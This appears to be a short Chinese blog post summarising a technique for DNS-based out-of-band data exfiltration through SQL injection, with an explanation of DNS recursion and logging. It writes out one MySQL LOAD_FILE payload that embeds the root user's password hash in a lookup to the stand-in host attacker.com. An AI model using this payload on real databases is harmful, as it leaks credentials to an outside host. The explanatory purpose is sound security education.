另一种的SQL注入和DNS结合的技巧

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了另一种的SQL注入和DNS结合的技巧相关的知识,希望对你有一定的参考价值。

这个技巧有些另类,当时某业界大佬提点了一下。当时真的真的没有理解到那种程度,现在可能也是没有理解到,但是我会努力。

本文章是理解于:http://netsecurity.51cto.com/art/201503/469621.htm

链接中的文章主要说的是什么?

先愉快的介绍了DNS工作原理,注意其中有一个术语叫做递归。这个是DNS服务关键的一部分。

这种攻击方式需要提前能查看DNS日志,利用SQL注入语句返回信息,迫使DNS递归,然后DNS日志的记录。

日志中就有SQL注入返回信息了。

例如:

SELECT LOAD_FILE(CONCAT(\\\\,(SELECT password FROM mysql.user WHERE user=root? LIMIT 1),.attacker.com\\foobar));

 

返回了:\\\\返回值(password).attacker.com\\foobar。触发了DNS递归,导致日志记录。

 

以上是关于另一种的SQL注入和DNS结合的技巧的主要内容,如果未能解决你的问题,请参考以下文章

基于约束的SQL攻击

PHP之防御sql注入攻击的方式 兄弟连分享经验技巧

代码调优Java开发中总结的代码质量优化技巧

代码调优Java开发中总结的代码质量优化技巧

以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响?

dnslog小技巧